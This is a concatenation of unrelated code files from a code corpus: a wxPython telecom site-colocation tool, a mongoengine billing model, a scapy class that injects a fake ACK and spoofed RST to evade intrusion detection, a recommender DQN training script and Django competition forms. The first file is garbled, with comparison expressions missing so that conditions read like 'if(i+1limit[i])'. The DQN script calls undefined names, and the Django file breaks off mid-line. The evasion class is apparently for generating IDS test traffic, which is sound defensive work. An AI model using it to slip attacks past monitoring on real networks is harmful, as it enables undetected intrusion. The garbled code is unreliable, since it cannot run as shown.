5)\r\n\r\n paratextSizer.Add(para1, 0, wx.ALL, 5)\r\n paratextSizer.Add(para2, 0, wx.ALL, 5)\r\n\r\n paraSizer.Add(self.box1, 0, wx.ALL, 5)\r\n paraSizer.Add(self.box2, 0, wx.ALL, 5)\r\n\r\n \r\n btnSizer.Add(title3, 0, wx.ALL, 5) \r\n btnSizer.Add(okBtn, 0, wx.ALL, 5)\r\n btnSizer.Add(cancelBtn, 0, wx.ALL, 5)\r\n \r\n topSizer.Add(titleSizer, 0, wx.CENTER)\r\n 
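# thin StaticLine rules below separate the groups of controls\r\n        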
topSizer.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\r\n topSizer.Add(uploadSizer, 0, wx.CENTER)\r\n topSizer.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\r\n topSizer.Add(paratextSizer, 0, wx.CENTER)\r\n topSizer.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5) \r\n topSizer.Add(paraSizer, 0, wx.CENTER)\r\n topSizer.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\r\n topSizer.Add(coloSizer, 0, wx.CENTER)\r\n topSizer.Add(wx.StaticLine(self.panel), 0, wx.ALL|wx.EXPAND, 5)\r\n topSizer.Add(btnSizer, 0, wx.ALL|wx.CENTER, 5)\r\n \r\n # SetSizeHints(minW, minH, maxW, maxH)\r\n self.SetSizeHints(250,300,500,400)\r\n \r\n self.panel.SetSizer(topSizer)\r\n topSizer.Fit(self)\r\n#Framework Layout is done, now defining there function which will be called\r\n\r\n#onCreate generate the colocation pair sheet \r\n def onCreate(self, event):\r\n print(\"Wait Code running...\")\r\n st=directory\r\n os.chdir(st)\r\n xl = pd.ExcelFile(file)\r\n dfv=xl.parse(xl.sheet_names[0])\r\n dfi=xl.parse(xl.sheet_names[1])\r\n df = pd.DataFrame(columns=['Site','Long-1','Lat-1','Colocated site','Long-2','Lat-2','Distance'])\r\n start_time = time.time()\r\n c=0\r\n for i in range(len(dfv)):\r\n for j in range(len(dfi)): \r\n d=self.distance_between_points(float(dfv.iat[i,2]), float(dfv.iat[i,1]), float(dfi.iat[j,2]), float(dfi.iat[j,1]))\r\n if(d<0.05):\r\n s=pd.Series([dfv.iat[i,0],dfv.iat[i,1],dfv.iat[i,2],dfi.iat[j,0],dfi.iat[j,1],dfi.iat[j,2],d],index=['Site','Long-1','Lat-1','Colocated site','Long-2','Lat-2','Distance'])\r\n df=df.append(s, ignore_index=True)\r\n c+=1\r\n newfile=directory+\"\\Colocation.xlsx\"\r\n newfile.replace('\"','')\r\n writer = pd.ExcelWriter(newfile)\r\n df.to_excel(writer,sheet_name=\"Site_colocation\",index=False)\r\n writer.save()\r\n print(\"--- %d Colocations ---\" % (c))\r\n print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\n print ('onOK handler')\r\n\r\n def onCancel(self, event):\r\n self.closeProgram()\r\n\r\n \r\n def closeProgram(self):\r\n self.Close()\r\n\r\n#updates the operator-1 parameters as soon it is selected\r\n def on_click1(self,event):\r\n global parameter_opr1\r\n parameter_opr1=self.box1.GetSelections()\r\n print(parameter_opr1)\r\n\r\n#updates the operator-2 parameters as soon it is selected\r\n def on_click2(self,event):\r\n global parameter_opr2\r\n parameter_opr2=self.box2.GetSelections()\r\n print(parameter_opr2)\r\n \r\n#Generates Capacity Analysis of the colocation pair\r\n def onOK(self,event):\r\n print(\"Wait Code running...\")\r\n \r\n#Reading the file\r\n st=directory\r\n os.chdir(st)\r\n xl = pd.ExcelFile(file)\r\n dfv=xl.parse(xl.sheet_names[0])\r\n dfi=xl.parse(xl.sheet_names[1])\r\n dfall=pd.concat([dfi,dfv],axis=0)\r\n\r\n \r\n clm_idea=[]\r\n clm_idea=(list(dfi))\r\n num_array_idea=[]\r\n all_para_idea=[]\r\n for i in range(4,len(clm_idea)):\r\n all_para_idea.append(clm_idea[i])\r\n num_array_idea.append(i)\r\n\r\n clm_voda=[]\r\n clm_voda=(list(dfv))\r\n\r\n num_array_voda=[]\r\n all_para_voda=[]\r\n for i in range(4,len(clm_voda)):\r\n all_para_voda.append(clm_voda[i])\r\n num_array_voda.append(i)\r\n\r\n parameter_voda=list()\r\n num = len(parameter_opr1)\r\n for i in range(int(num)):\r\n parameter_voda.append(clm_voda[parameter_opr1[i]+4])\r\n\r\n print(parameter_voda)\r\n\r\n parameter_idea=list()\r\n num = len(parameter_opr2)\r\n for i in range(int(num)):\r\n parameter_idea.append(clm_idea[parameter_opr2[i]+4])\r\n\r\n print(parameter_idea)\r\n\r\n for i in range(len(all_para_idea)):\r\n 
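# pool both operators (dfall) so the mean/max cover the combined payload data\r\n            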
mean.append(dfall[all_para_idea[i]].mean())\r\n maximum.append(dfall[all_para_idea[i]].max())\r\n\r\n for i in range(len(all_para_idea)):\r\n sd.append(dfall[all_para_idea[i]].std())\r\n limit.append(mean[i]+2*sd[i])\r\n\r\n\r\n start_time = time.time()\r\n#creating header of the file\r\n clm=['Site','Long-1','Lat-1']\r\n for i in range(len(all_para_idea)):\r\n clm.append(all_para_idea[i])\r\n clm.append('Colocated Site')\r\n clm.append('Long-2')\r\n clm.append('Lat-2')\r\n for i in range(len(all_para_voda)):\r\n clm.append(all_para_voda[i])\r\n clm.append('Distance')\r\n for i in range(len(all_para_voda)):\r\n clm.append('Dominant-'+all_para_voda[i])\r\n clm.append('Analysis WRT:'+all_para_voda[i])\r\n \r\n clm.append('Final Dominant')\r\n df = pd.DataFrame(columns=clm)\r\n\r\n#for each site in dfi, iterating over dfv to find colocation and getting the capacity analysis\r\n for i in range(len(dfi)):\r\n for j in range(len(dfv)): \r\n d=self.distance_between_points(float(dfi.iat[i,2]), float(dfi.iat[i,1]), float(dfv.iat[j,2]), float(dfv.iat[j,1]))\r\n if(d<0.05):\r\n lsti.append([dfi.iat[i,0],dfi.iat[i,1],dfi.iat[i,2],dfi.iat[i,3],dfi.iat[i,4],dfi.iat[i,5],dfi.iat[i,6]])\r\n lstv.append([dfv.iat[j,0],dfv.iat[j,1],dfv.iat[j,2],dfv.iat[j,3],dfv.iat[j,4],dfv.iat[j,5],dfv.iat[j,6]])\r\n\r\n dfid=pd.DataFrame(lsti,columns=['Site_ID', 'Long', 'Lat', 'Site_Type ', '2G Payload', '3G pay load ', '4G Payload '])\r\n dfvo=pd.DataFrame(lstv,columns=['Site_ID', 'Long', 'Lat', 'Site_Type ', '2G Payload', '3G pay load ', '4G Payload '])\r\n\r\n\r\n para_idea=list(all_para_idea)\r\n para_voda=list(all_para_voda)\r\n arr_idea=list(num_array_idea)\r\n arr_voda=list(num_array_voda)\r\n j=0\r\n for i in range(len(all_para_voda)):\r\n j=j+1\r\n if(((all_para_voda[i]) not in parameter_voda) and ((all_para_idea[i]) in parameter_idea)) :\r\n # print(i)\r\n dfid[all_para_idea[i]]=dfid[all_para_idea[i]]+dfvo[all_para_voda[i]]\r\n dfvo[all_para_voda[i]]=0\r\n elif(((all_para_idea[i]) not in parameter_idea) and ((all_para_voda[i]) in parameter_voda)) :\r\n # print(i)\r\n dfvo[all_para_voda[i]]=dfvo[all_para_voda[i]]+dfid[all_para_idea[i]]\r\n dfid[all_para_idea[i]]=0\r\n elif(((all_para_idea[i]) not in parameter_idea) and ((all_para_voda[i]) not in parameter_voda)) :\r\n # print(1)\r\n # print(i)\r\n del dfid[all_para_idea[i]]\r\n del dfvo[all_para_voda[i]]\r\n para_idea.remove(all_para_idea[i])\r\n para_voda.remove(all_para_voda[i])\r\n # if(i+1limit[i]):\r\n if(arg1[i]>arg2[i]):\r\n c[k]=\"Dominant -\" + site1 +\"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n else: \r\n c[k]=\"Dominant -\" + site2 + \"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n elif((0limit[i]):\r\n if(arg1[i]>arg2[i]):\r\n c[k]=\"Dominant -\" + site1 +\"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n else: \r\n c[k]=\"Dominant -\" + site2 + \"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n elif(((arg1[i]>limit[i] and arg2[i]limit[i])) and arg1[i]+arg2[i]>limit[i]):\r\n if(arg1[i]>arg2[i]):\r\n c[k]=\"Dominant -\" + site1 +\"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n else: \r\n c[k]=\"Dominant -\" + site2 + \"Overflow : \"+str((arg1[i]+arg2[i])-limit[i])\r\n k=k+1\r\n else:\r\n c[k]=\"Not Possible\"\r\n k=k+1\r\n \r\n \r\n else:\r\n if(a[i]sumb):\r\n c[k]=site1\r\n else:\r\n c[k]=site2\r\n \r\n return c\r\n \r\n\r\n# Run the program\r\nif __name__ == '__main__':\r\n app = wx.App()\r\n frame = MyForm().Show()\r\n app.MainLoop()\r\n 
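# reached only once the GUI event loop exits\r\n    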
print(directory)\r\n","sub_path":"Capacity-Colocation_FrameWork.py","file_name":"Capacity-Colocation_FrameWork.py","file_ext":"py","file_size_in_byte":17532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"417334079","text":"# -*- coding: utf-8 -*-\n\nfrom mongoengine import Document, ReferenceField, StringField, IntField, FloatField, DateTimeField, BooleanField\nfrom datetime import datetime, timedelta\nfrom apps.billing.constans import ACCESS_CAM_ORDER_STATUS\nfrom mongoengine.queryset import Q\n\n\nclass Tariff(Document):\n    name = StringField(required=True, unique=True, max_length=255)\n    description = StringField()\n    cost = FloatField(required=True)\n    # in seconds\n    duration = IntField(required=False)\n\n    # tariff that grants camera control\n    is_controlled = BooleanField(default=False)\n\n    # packet (fixed-duration bundle) tariff\n    is_packet = BooleanField()\n\n\n\n    meta = {\n        'ordering': [\n            'name',\n        ]\n    }\n\n    def save(self, *args, **kwargs):\n        self.is_packet = bool(self.duration)\n        return super(Tariff, self).save(*args, **kwargs)\n\n\n    @classmethod\n    def get_management_packet_tariff_list(cls):\n        return cls.objects(is_controlled=True, is_packet=True)\n    \n    @classmethod\n    def get_management_time_tariff_list(cls):\n        return cls.objects(is_controlled=True, is_packet=False)\n    \n    @classmethod\n    def get_view_packet_tariff_list(cls):\n        return cls.objects(is_controlled=False, is_packet=True)\n\n    @classmethod\n    def get_view_time_tariff_list(cls):\n        return cls.objects(is_controlled=False, is_packet=False)\n\n\nclass AccessCamOrder(Document):\n    is_controlled = BooleanField(default=False)\n    tariff = ReferenceField('Tariff')\n    duration = FloatField(default=0.0) # in seconds\n    count_packets = IntField()\n    camera = ReferenceField('Camera')\n    user = ReferenceField('User')\n    begin_date = DateTimeField()\n    end_date = DateTimeField()\n    cost = FloatField()\n    create_on = DateTimeField(default=datetime.now)\n\n\n    @property\n    def is_packet(self):\n        return self.count_packets is not None\n\n    @property\n    def status(self):\n        if self.begin_date is None:\n            return ACCESS_CAM_ORDER_STATUS.WAIT\n        now = datetime.now()\n        if self.begin_date <= now:\n            if self.end_date is None or now < self.end_date:\n                return ACCESS_CAM_ORDER_STATUS.ACTIVE\n            return ACCESS_CAM_ORDER_STATUS.COMPLETE\n        return ACCESS_CAM_ORDER_STATUS.WAIT\n\n\n    @classmethod\n    def create_packet_type(cls, user, camera, tariff, count_packets):\n        assert tariff.is_packet\n        order = cls(user=user, camera=camera, tariff=tariff)\n        order.count_packets = count_packets\n        order.cost = tariff.cost * order.count_packets\n        order.duration = order.count_packets * tariff.duration\n        order.set_access_period()\n        order.save()\n        return order\n\n    @classmethod\n    def create_time_type(cls, user, camera, tariff):\n        assert not tariff.is_packet\n        order = cls(user=user, camera=camera, tariff=tariff)\n        if not order.can_add_time_order():\n            raise AccessCamOrder.CanNotAddOrder()\n        order.save()\n        return order\n\n\n    def __init__(self, *args, **kwargs):\n        super(AccessCamOrder, self).__init__(*args, **kwargs)\n        self.is_controlled = self.tariff.is_controlled\n\n    def save(self, *args, **kwargs):\n        is_new = self.id is None  # must be read before super() assigns an id\n        super(AccessCamOrder, self).save(*args, **kwargs)\n        if self.is_packet and is_new:\n            self.user.cash -= self.cost\n            self.user.save()\n\n\n    def set_end_date(self):\n        self.end_date = self.begin_date + timedelta(seconds=self.duration)\n\n    def can_add_time_order(self):\n        q_data = dict(camera=self.camera,\n                      is_controlled=self.is_controlled)\n        if not 
self.is_controlled:\n            q_data.update(dict(user=self.user))\n        last_order = AccessCamOrder.objects(**q_data).order_by('-create_on').only('end_date').first()\n\n        if last_order and last_order.end_date is None:\n            if self.is_controlled:\n                # find time user order\n                q_data.update(dict(user=self.user,\n                                   end_date__exists=False,\n                                   count_packets__exists=False, # is not packet\n                                   ))\n                if AccessCamOrder.objects(**q_data).count() > 0:\n                    return False\n            else:\n                return False\n        return True\n\n    def set_access_period(self):\n        q_data = dict(camera=self.camera,\n                      is_controlled=self.is_controlled)\n        if not self.is_controlled:\n            q_data.update(dict(user=self.user))\n        last_order = AccessCamOrder.objects(**q_data).order_by('-create_on').only('end_date').first()\n\n        now = datetime.now()\n        if last_order:\n            if last_order.end_date:\n                self.begin_date = last_order.end_date if last_order.end_date > now else now\n        else: # first order\n            self.begin_date = now\n        if self.begin_date and self.is_packet:\n            self.set_end_date()\n\n    def set_time_at_end(self):\n        if self.end_date is not None or self.count_packets is not None:\n            return False\n        self.end_date = self.begin_date + timedelta(seconds=self.duration)\n\n        if self.is_controlled:\n            orders = AccessCamOrder.objects(camera=self.camera,\n                                            is_controlled=self.is_controlled,\n                                            create_on__gt=self.create_on).order_by('create_on').all()\n            if orders:\n                last_end_date = self.end_date\n                for order in orders:\n                    if order.count_packets is not None:\n                        break\n                    order.begin_date = last_end_date + timedelta(seconds=1)\n                    order.set_end_date()\n                    order.save()\n                    last_end_date = order.end_date\n                if self.is_controlled:\n                    self.camera.operator = orders[0].user\n                else:\n                    self.camera.operator = None\n                self.camera.save()\n\n    def can_access(self):\n        return self.status == ACCESS_CAM_ORDER_STATUS.ACTIVE\n\n    def get_time_left(self, user_cash=None):\n        user_cash = user_cash or self.user.cash\n        if user_cash < 0:\n            return 0\n        return int(user_cash/self.tariff.cost)\n\n\n    class CanNotAddOrder(Exception):\n        pass","sub_path":"apps/billing/documents.py","file_name":"documents.py","file_ext":"py","file_size_in_byte":6389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"231713400","text":"from scapy.all import *\n\n\"\"\"\npackets will always be as such\nas long as it is TCP and established\n\npackets[0] -> SYN\npackets[1] -> SYN-ACK\npackets[2] -> ACK\npackets[3] -> DATA\npackets[4] -> ACK\npackets[5] -> FIN-ACK\npackets[6] -> ACK\n\"\"\"\n\nclass Evasion:\n\tdef __init__(self, packets):\n\t\tself.type = \"\"\n\t\tself.credit = \"\"\n\t\tself.packets = packets\n\n\tdef alteredAck(self):\n\t\tself.credit = \"Judy Novak\"\n\t\tself.type = \"client\"\n\t\t\n\t\t#Create the RST\n\t\tsource = self.packets[2][IP].src\n\t\tdestination = self.packets[2][IP].dst\n\t\tsrcport = self.packets[2][TCP].sport\n\t\tdstport = self.packets[2][TCP].dport\n\t\tseqnum = self.packets[2][TCP].seq\n\t\tacknum = self.packets[2][TCP].ack\n\n\t\tfakeAck = IP(src=source, dst=destination)/TCP(sport=srcport, dport=dstport, flags=\"A\", seq=seqnum, ack=acknum+1)\n\n\t\trst = IP(src=destination, dst=source)/TCP(sport=dstport, dport=srcport, flags=\"R\", seq=acknum)\n\n\t\t#The rst packet needs to go after the fake rst\n\t\tstore = []\n\t\tfor i in range(5):\n\t\t\tstore.append(self.packets.pop())\n\t\tstore.reverse()\n\n\t\t#Append the fake ACK followed by the RST\n\t\tself.packets.append(fakeAck)\n\t\tself.packets.append(rst)\n\n\t\t#Tack on all of the original packets\n\t\tfor packet in 
store:\n\t\t\tself.packets.append(packet)\n\n\t\treturn self.packets\n","sub_path":"Generator/Evasion.py","file_name":"Evasion.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"320961979","text":"import numpy as np\nimport pickle\nimport random\nimport torch\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom model import GCN_GRU, GRU, Net\nfrom env import Simulator, Config\nfrom dataloader import *\nfrom collections import deque\ndef pretrain_embedding(config, entity_vocab, relation_vocab, model, optimizer):\n    model.train()\n\n    dataloader = get_TransE_dataloader(config, entity_vocab, relation_vocab)\n    for epoch in range(2):\n        total_loss = 0\n        for positive_triples, negative_triples in dataloader: \n            optimizer.zero_grad()\n            loss = model.TransE_forward(positive_triples, negative_triples)\n            loss.backward()\n            optimizer.step()\n\n            total_loss += loss.item()\n        print('TransE epoch', epoch, 'loss', total_loss)\n\n\ndef train(config, item_vocab, model, optimizer):\n    memory = deque(maxlen=10000)\n    policy_net = Net()\n    target_net = Net()\n    TARGET_UPDATE = 100\n    BATCH_SIZE = 10\n    GAMMA = 0.99  # discount factor (assumed value; not specified anywhere in this script)\n    def tmp_Q_eps_greedy(state, actions):\n        epsilon = 0.3\n        state = torch.tensor(state, dtype=torch.float)\n        out = policy_net.forward(state)\n        out = out.detach().numpy()\n        coin = random.random()\n        if coin < epsilon:\n            return actions[np.random.choice(range(len(actions)))]\n        else:\n            return actions[np.argmax(out)]\n    \n    def memory_sampling(memory):\n        mini_batch = random.sample(memory, BATCH_SIZE)\n        s_lst, a_lst, r_lst, s_prime_lst, done_mask_lst = [], [], [], [], []\n\n        for transition in mini_batch:\n            t_state, t_action, t_reward, t_next_state, t_done = transition\n            s_lst.append(t_state)\n            a_lst.append([t_action])\n            r_lst.append([t_reward])\n            s_prime_lst.append(t_next_state)\n            done_mask_lst.append([t_done])\n        return torch.tensor(s_lst, dtype=torch.float), torch.tensor(a_lst), torch.tensor(r_lst), torch.tensor(s_prime_lst, dtype=torch.float), torch.tensor(done_mask_lst)\n\n    def optimize_model(memory):\n        state_batch, action_batch, reward_batch, next_state_batch, done_batch = memory_sampling(memory)\n        state_action_values = policy_net(state_batch) \n        next_state_values = target_net(next_state_batch)\n        max_val_list = []  # max target-net value for each sampled transition\n        for next_state_value in next_state_values:\n            max_val = max(next_state_value).tolist()\n            max_val_list.append(max_val)\n        expected_state_action_values = state_action_values.tolist()\n        for i in range(len(state_action_values)):\n            action = action_batch[i]\n            expected_state_action_values[i][action] = (max_val_list[i] * GAMMA) + reward_batch[i]\n        expected_state_action_values = torch.tensor(expected_state_action_values)\n        loss = F.smooth_l1_loss(state_action_values, expected_state_action_values)\n        #print('loss', loss)\n        optimizer = optim.RMSprop(policy_net.parameters())\n        optimizer.zero_grad()\n        loss.backward()\n        for param in policy_net.parameters():\n            param.grad.data.clamp_(-1, 1)\n        optimizer.step()\n\n    simulator = Simulator(config=config, mode='train')\n    num_users = len(simulator)\n    total_step_count = 0\n    for e in range(config.epochs):\n        for u in range(num_users):\n            user_id, item_ids, rates = simulator.get_data(u)\n            candidates = []\n            done = False\n            print('user_id:', user_id)\n            for t, (item_id, rate) in enumerate(zip(item_ids, rates)):\n                if t == len(item_ids)-1: done = True\n                print('t',t,'item_id',item_id,'rate',rate)\n                # TODO\n                # Embed item using GCN Algorithm1 line 6 ~ 7\n                item_idx = item_id\n                embedded_item_state = model.entity_emb.weight[item_idx] # (50)\n                
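# user state produced by the recurrent model from the session so far\n                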
embedded_user_state = model(item_idx) # (20)\n\n                # TODO\n                # Candidate selection and embedding\n                if rate > config.threshold:\n                    n_hop_dict = model.get_n_hop(item_id)\n                    candidates.extend(n_hop_dict[1])\n                    candidates = list(set(candidates)) # Need to get rid of recommended items\n\n                candidates_embeddings = model.entity_emb.weight[torch.tensor(candidates, dtype=torch.int64)]\n                print('candidate shape:',candidates_embeddings.shape)\n                # candidates_embeddings = item_ids # Embed each item in n_hop_dict using each item's n_hop_dict\n                # candidates_embeddings' shape = (# of candidates, config.item_embed_dim)\n\n                # Recommendation using epsilon greedy policy\n                recommend_item_id = tmp_Q_eps_greedy(state=embedded_user_state, actions=candidates_embeddings)\n                reward = simulator.step(user_id, recommend_item_id)\n\n                # TODO\n                # Q learning\n                # Store transition to buffer\n                state, action, reward, next_state, done = embedded_user_state, recommend_item_id, reward, tmp_state_embed(x.append(recommend_item_id)), done # how should 'done' be handled here?\n                Tuple = (state, action, reward, next_state, done) \n                memory.append(Tuple)\n                # target update\n                total_step_count+=1\n                if total_step_count % TARGET_UPDATE ==0:\n                    target_net.load_state_dict(policy_net.state_dict())\n                if len(memory) > 100: \n                    optimize_model(memory)\n\nif __name__ == '__main__':\n\n    with open('./data/movie/entity_vocab.pkl','rb') as f:\n        entity_vocab = pickle.load(f)\n    with open('./data/movie/item_vocab.pkl','rb') as f:\n        item_vocab = pickle.load(f)\n    with open('./data/movie/relation_vocab.pkl','rb') as f:\n        relation_vocab = pickle.load(f)\n\n    print('| Building Net')\n    #model = GCN_GRU(Config(), 50, entity_vocab, relation_vocab)\n    model = GRU(Config(), 50, entity_vocab, relation_vocab)\n    optimizer = optim.SGD(model.parameters(), lr=0.01)\n    ''' \n    print('Embedding pretrain by TransE...')\n    pretrain_embedding(Config(), entity_vocab, relation_vocab, model, optimizer)\n    \n    print('Save embedding_pretrained model...')\n    path = './embedding_pretrained.pth'\n    torch.save(model.state_dict(),path)\n    \n    print('Load embedding_pretrained model...')\n    path = './embedding_pretrained.pth'\n    model.load_state_dict(torch.load(path))\n    '''\n    print('Train...')\n    train(Config(), item_vocab, model, optimizer)\n","sub_path":"wo_GCN_train.py","file_name":"wo_GCN_train.py","file_ext":"py","file_size_in_byte":6465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"437662884","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError\nfrom django.forms.models import BaseModelFormSet, ModelForm\nfrom django.utils.encoding import force_unicode\nfrom django.utils.html import mark_safe\nfrom django.utils.translation import get_language\nfrom django.utils.translation import ugettext as _\nfrom django.utils.translation import ugettext_lazy\n\nfrom skoljka.competition.evaluator import (\n    get_evaluator,\n    get_solution_help_text,\n    safe_parse_descriptor,\n)\nfrom skoljka.competition.evaluator_base import InvalidDescriptor, InvalidSolution\nfrom skoljka.competition.models import Chain, CompetitionTask, Team, TeamMember\nfrom skoljka.competition.utils import (\n    comp_url,\n    ctask_comment_class,\n    parse_team_categories,\n)\nfrom skoljka.utils import xss\n\n\nclass CompetitionSolutionForm(forms.Form):\n    result = forms.CharField(max_length=255)\n\n    def __init__(self, *args, **kwargs):\n        self.descriptor = kwargs.pop('descriptor')\n        self.evaluator = kwargs.pop('evaluator')\n        
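# custom kwargs are popped above so the base Form never sees them\n        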
super(CompetitionSolutionForm, self).__init__(*args, **kwargs)\n\n def clean_result(self):\n data = self.cleaned_data['result']\n try:\n self.evaluator.check_result(self.descriptor, data)\n except InvalidSolution as e:\n # TODO: Make a base form that automatically does this (depending on\n # a parameter).\n self.fields['result'].widget.attrs.update({'class': 'ctask-submit-error'})\n raise forms.ValidationError(unicode(e))\n except InvalidDescriptor as e:\n self.fields['result'].widget.attrs.update({'class': 'ctask-submit-error'})\n raise forms.ValidationError(_(\"Descriptor error. Please notify admins!\"))\n return data\n\n\nclass BaseCompetitionTaskFormSet(BaseModelFormSet):\n def add_fields(self, form, index):\n super(BaseCompetitionTaskFormSet, self).add_fields(form, index)\n # initial_text = form.instance.pk and form.instance.task.content.text\n # form.fields[\"text\"] = forms.CharField(widget=forms.Textarea,\n # initial=initial_text)\n\n\nclass CompetitionTaskForm(ModelForm):\n name = forms.CharField()\n text = forms.CharField(widget=forms.Textarea)\n comment = forms.CharField(widget=forms.Textarea, required=False)\n\n def __init__(self, *args, **kwargs):\n self.competition = kwargs.pop('competition')\n self.evaluator = get_evaluator(self.competition.evaluator_version)\n self.fixed_score = self.competition.fixed_task_score\n user = kwargs.pop('user')\n super(CompetitionTaskForm, self).__init__(*args, **kwargs)\n\n self.t_comment_extra_class = \"ctask-comment\"\n if self.instance.pk:\n self.fields['name'].initial = self.instance.task.name\n self.fields['text'].initial = self.instance.task.content.text\n self.fields['comment'].initial = self.instance.comment.text\n self.t_comment_extra_class += \" \" + ctask_comment_class(self.instance, user)\n\n descriptor = self.initial.get('descriptor')\n if descriptor:\n variables = safe_parse_descriptor(self.evaluator, descriptor)\n self.fields['descriptor'].help_text = get_solution_help_text(\n variables, error_message=_(\"Invalid!\"), show_types=True\n )\n self.fields['descriptor'].label = mark_safe(\n xss.escape(_(\"Solution\"))\n + ' '\n )\n if not self.competition.use_custom_ctask_names():\n del self.fields['name']\n if self.fixed_score:\n del self.fields['max_score']\n\n self.fields['text'].widget.attrs.update(\n {'class': 'comp-mathcontent-text', 'rows': 15}\n )\n self.fields['comment'].widget.attrs.update(\n {'class': 'comp-mathcontent-text ctask-comment', 'rows': 3}\n )\n\n def clean(self):\n super(CompetitionTaskForm, self).clean()\n self.instance._text = self.cleaned_data.get('text')\n self.instance._comment = self.cleaned_data.get('comment')\n if self.fixed_score:\n self.instance.max_score = self.fixed_score\n return self.cleaned_data\n\n def clean_descriptor(self):\n data = self.cleaned_data['descriptor']\n try:\n variables = self.evaluator.parse_descriptor(data)\n except InvalidDescriptor as e:\n self.fields['descriptor'].help_text = \"\"\n raise forms.ValidationError(unicode(e))\n self.fields['descriptor'].help_text = variables[0].help_text()\n return data\n\n class Meta:\n model = CompetitionTask\n fields = ('descriptor', 'max_score')\n\n\nclass ChainForm(forms.ModelForm):\n \"\"\"Form for creating or editing chains.\n\n For course-like competitions, the `unlock_minutes` field is replaced with\n an `unlock_days` field.\n \"\"\"\n\n class Meta:\n model = Chain\n fields = [\n 'name',\n 'category',\n 'unlock_minutes',\n 'bonus_score',\n 'position',\n 'unlock_mode',\n ]\n\n def __init__(self, *args, **kwargs):\n self.competition = 
kwargs.pop('competition')\n super(ChainForm, self).__init__(*args, **kwargs)\n if self.competition.is_course:\n del self.fields['unlock_minutes']\n days = self.instance.unlock_minutes / (24 * 60.0) if self.instance else 0\n self.fields['unlock_days'] = forms.FloatField(\n label=_(\"Unlock days\"), min_value=0, initial=days\n )\n\n def clean(self):\n data = self.cleaned_data\n if self.competition.is_course:\n self.cleaned_data['unlock_minutes'] = int(\n (data['unlock_days'] or 0) * 24 * 60\n )\n del data['unlock_days']\n return data\n\n\ndef clean_unused_ctask_ids(competition, ctask_ids):\n if not ctask_ids:\n return [], []\n try:\n ctask_ids = [int(x) for x in ctask_ids.split(',')]\n except ValueError:\n raise ValidationError(\"Invalid input.\")\n ctasks_dict = CompetitionTask.objects.filter(competition=competition).in_bulk(\n ctask_ids\n )\n if len(ctask_ids) != len(ctasks_dict):\n raise ValidationError(\"Unknown competition task ID.\")\n for ctask in ctasks_dict.itervalues():\n if ctask.chain_id is not None:\n raise ValidationError(\"Some tasks were already used.\")\n ctasks = [ctasks_dict[id] for id in ctask_ids]\n return ctask_ids, ctasks\n\n\nclass ChainTasksForm(ChainForm):\n ctask_ids = forms.CharField(widget=forms.HiddenInput(), required=False)\n\n def __init__(self, *args, **kwargs):\n super(ChainTasksForm, self).__init__(*args, **kwargs)\n\n self.fields['name'].widget.attrs.update({'class': 'span6'})\n self.fields['category'].widget.attrs.update({'class': 'span2'})\n if 'unlock_minutes' in self.fields:\n self.fields['unlock_minutes'].widget.attrs.update({'class': 'span1'})\n else:\n self.fields['unlock_days'].widget.attrs.update({'class': 'span1'})\n self.fields['bonus_score'].widget.attrs.update({'class': 'span1'})\n self.fields['position'].widget.attrs.update({'class': 'span1'})\n self.fields['ctask_ids'].widget.attrs.update({'id': 'cchain-unused-ctasks-ids'})\n\n def clean_ctask_ids(self):\n ctask_ids, ctasks = clean_unused_ctask_ids(\n self.competition, self.cleaned_data['ctask_ids']\n )\n self.cleaned_data['ctasks'] = ctasks\n return ctask_ids\n\n\nclass TeamCategoryRadioSelectRenderer(forms.widgets.RadioFieldRenderer):\n def render(self):\n \"\"\"Customize radio select render, not to use
        .\"\"\"\n return mark_safe(u'\\n'.join([force_unicode(w) for w in self]))\n\n\nclass TeamForm(forms.ModelForm):\n def __init__(self, *args, **kwargs):\n lang = get_language()\n instance = kwargs.get('instance', None)\n initial = dict(kwargs.pop('initial', {}))\n extra_fields = []\n competition = kwargs.pop('competition')\n self.competition_id = competition.id\n self.max_team_size = kwargs.pop('max_team_size', 3)\n self.user = kwargs.pop('user')\n\n if instance:\n # Author cannot be removed from the team.\n team_members = list(\n TeamMember.objects.filter(team=instance)\n .exclude(member_id=instance.author_id)\n .values_list('member_name', 'member_id')\n )\n else:\n team_members = []\n\n # Add extra fields for other members.\n for k in xrange(2, self.max_team_size + 1):\n if k - 2 < len(team_members):\n member_name = team_members[k - 2]\n else:\n member_name = ''\n field_manual = 'member{}_manual'.format(k)\n field_username = 'member{}_username'.format(k)\n initial[field_manual] = member_name\n initial[field_username] = member_name\n\n # Label empty because HTML generated via JavaScript anyway.\n extra_fields.append(\n (field_manual, forms.CharField(required=False, label=\"\", max_length=64))\n )\n extra_fields.append(\n (\n field_username,\n forms.CharField(\n required=False, max_length=32, widget=forms.HiddenInput()\n ),\n )\n )\n\n # Parse team category string.\n try:\n categories = parse_team_categories(competition.team_categories, lang)\n except (ValueError, KeyError, TypeError) as e:\n categories = [(1, \"team_categories invalid!!! \" + e.message)]\n self.team_categories = categories\n if categories and (not instance or not instance.category):\n initial['category'] = categories[-1][0] # For simplicity.\n\n super(TeamForm, self).__init__(initial=initial, *args, **kwargs)\n\n # Preserve order.\n for key, value in extra_fields:\n self.fields[key] = value\n\n self.fields['name'].widget.attrs['class'] = 'input-large'\n self.fields['name'].error_messages['required'] = _(\"Team name cannot be 